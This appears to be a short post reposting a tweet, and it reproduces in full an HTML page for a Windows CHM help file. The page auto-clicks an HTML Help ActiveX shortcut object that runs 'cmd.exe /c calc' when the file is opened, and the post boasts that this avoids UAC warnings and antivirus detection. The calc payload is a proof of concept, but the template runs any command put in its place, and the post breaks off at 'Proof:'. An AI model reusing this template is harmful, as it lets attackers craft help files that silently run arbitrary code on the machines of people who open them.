Run calc.exe via open Chm file, no UAC warning and no av detects!
powertool on Twitter: “Run calc.exe via open Chm file, no UAC warning and no av detects! Sample : https://t.co/ZntghJcnvZ http://t.co/NncyU0H2QI”: Run calc.exe via open Chm file, no UAC warning and no av detects!
The exploit is:
-
<HTML>
-
<TITLE>Run calc.exe</TITLE>
-
<HEAD>
-
</HEAD>
-
<BODY>
-
<OBJECT id=x classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ width=1 height=1>
-
<PARAM name=”Command” value=”ShortCut”>
-
<PARAM name=”Button” value=”Bitmap::shortcut”>
-
<PARAM name=”Item1″ value=”,cmd.exe,/c calc ,”>
-
<PARAM name=”Item2″ value=”273,1,1″>
-
</OBJECT>
-
<script>
-
x.Click();
-
</SCRIPT>
-
<A name=contents>
-
<H2 align=center>Run calc.exe via open Chm file!!!</H2>
-
<P></A>
-
<H3 ALIGN=CENTER>@ithurricanept</H3><P>
-
</BODY>
-
</HTML>
Proof: